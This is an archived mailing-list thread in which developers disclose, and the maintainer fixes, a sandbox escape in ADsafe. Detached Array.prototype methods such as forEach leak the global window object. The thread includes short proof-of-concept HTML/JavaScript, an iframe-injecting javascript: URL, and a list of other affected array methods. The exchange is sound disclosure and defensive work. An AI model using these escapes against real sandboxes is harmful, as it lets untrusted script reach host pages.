Loading ...
Sorry, an error occurred while loading the content.

Re: ADsafe and bind

Expand Messages
  • Douglas Crockford
    ... Thanks, Marcel, that was really helpful. ADsafe s mozilla function is now conditioned on the existence of slots for concat, filter, map, reverse, slice,
    Message 1 of 13 , Sep 8 11:47 AM
    • 0 Attachment
      --- In caplet@yahoogroups.com, "marcel.laverdet" <marcel@...> wrote:

      Thanks, Marcel, that was really helpful. ADsafe's mozilla function is
      now conditioned on the existence of slots for concat, filter, map,
      reverse, slice, and sort.

      I haven't found the leak in forEach. How does that one work?
    • marcel.laverdet
      ... As follows: var leak; ([].forEach || 0)(function(a,b,win) { leak = win; }); leak.alert(leak); Simple demo:
      Message 2 of 13 , Sep 8 11:57 AM
      • 0 Attachment
        --- In caplet@yahoogroups.com, "Douglas Crockford" <douglas@...> wrote:
        >
        > --- In caplet@yahoogroups.com, "marcel.laverdet" <marcel@> wrote:
        >
        > Thanks, Marcel, that was really helpful. ADsafe's mozilla function is
        > now conditioned on the existence of slots for concat, filter, map,
        > reverse, slice, and sort.
        >
        > I haven't found the leak in forEach. How does that one work?
        >

        As follows:
        <iframe src="#"></iframe>
        <script>
        var leak;
        ([].forEach || 0)(function(a,b,win) {
        leak = win;
        });
        leak.alert(leak);
        </script>

        Simple demo:
        http://llamaguy.com/adsafe/

        It even works in Safari :D
      • brendaneich
        ... These vulnerabilities were first pointed out by Jeff Walden and Eli Friedman, then interns at Mozilla, in August 2007. Jeff wrote back then in reply to
        Message 3 of 13 , Sep 8 12:20 PM
        • 0 Attachment
          --- In caplet@yahoogroups.com, "Douglas Crockford" <douglas@...> wrote:
          >
          > --- In caplet@yahoogroups.com, "marcel.laverdet" <marcel@> wrote:
          >
          > Thanks, Marcel, that was really helpful. ADsafe's mozilla function is
          > now conditioned on the existence of slots for concat, filter, map,
          > reverse, slice, and sort.
          >
          > I haven't found the leak in forEach. How does that one work?

          These vulnerabilities were first pointed out by Jeff Walden and Eli
          Friedman, then interns at Mozilla, in August 2007. Jeff wrote back
          then in reply to Marcel:

          "... you need only call it on something that has a length property (or
          a getter that doesn't throw), and so long as your provided function
          *is* one, it'll get called for each item less than the pre-computed
          length. Here's an example:

          =====

          <a onclick="boom();">click here</a>
          <script>

          function boom()
          {
          var win = null;
          var forEach = [].forEach;
          forEach(function(val, prop, thisp) {
          win = thisp;
          }, []);
          win.alert("Hello world!");
          }

          </script>

          =====

          Aha, but that doesn't work, and for a simple enough reason: the test
          console page (presumably you used this) doesn't have any subframes,
          iframes, etc. Consequently, |window.length == 0| and there's nothing
          to iterate over, so the callback is never called. However, it's a
          reasonably safe bet that most Facebook pages *will* contain iframes
          for ads, and with an iframe in the document it'll succeed. To
          demonstrate this, simply run the following URL on the test console
          after loading the given example:

          javascript:var d = document;
          d.body.appendChild(d.createElement("iframe"));[].v

          Before I load that, the exploit fails. After I load it, it succeeds.

          Jeff

          0.
          http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Reference:Global_Objects:Array:forEach
          "

          Separately, Eli wrote:

          "Some other methods that are also vulnerable: Array.prototype.reverse,
          Array.prototype.sort, Array.prototype.forEach (returns this in Safari 2
          only), and Object.prototype.valueOf.

          Also, combined with Array.prototype.push or Array.prototype.unshift or
          the existence of a subframe, a similar vulnerability exists with
          Array.prototype.forEach, Array.prototype.every, Array.prototype.map,
          Array.prototype.some, Array.prototype.reduce (Fx 3 only),
          Array.prototype.reduceRight (Fx 3 only), and Array.prototype.filter.

          -Eli
          "

          So scrutinize all of the array extras, not just forEach, map, and filter.

          HTH, and credit where due.

          /be
        • Douglas Crockford
          ... Thanks. ADsafe is now wrapping concat every filter forEach map reduce reduceRight reverse slice some sort.
          Message 4 of 13 , Sep 8 1:06 PM
          • 0 Attachment
            --- In caplet@yahoogroups.com, "marcel.laverdet" <marcel@...> wrote:
            >
            > --- In caplet@yahoogroups.com, "Douglas Crockford" <douglas@> wrote:
            > >
            > > --- In caplet@yahoogroups.com, "marcel.laverdet" <marcel@> wrote:
            > >
            > > Thanks, Marcel, that was really helpful. ADsafe's mozilla function is
            > > now conditioned on the existence of slots for concat, filter, map,
            > > reverse, slice, and sort.
            > >
            > > I haven't found the leak in forEach. How does that one work?
            > >
            >
            > As follows:
            > <iframe src="#"></iframe>
            > <script>
            > var leak;
            > ([].forEach || 0)(function(a,b,win) {
            > leak = win;
            > });
            > leak.alert(leak);
            > </script>
            >
            > Simple demo:
            > http://llamaguy.com/adsafe/
            >
            > It even works in Safari :D

            Thanks. ADsafe is now wrapping concat every filter forEach map reduce
            reduceRight reverse slice some sort.
          Your message has been successfully submitted and would be delivered to recipients shortly.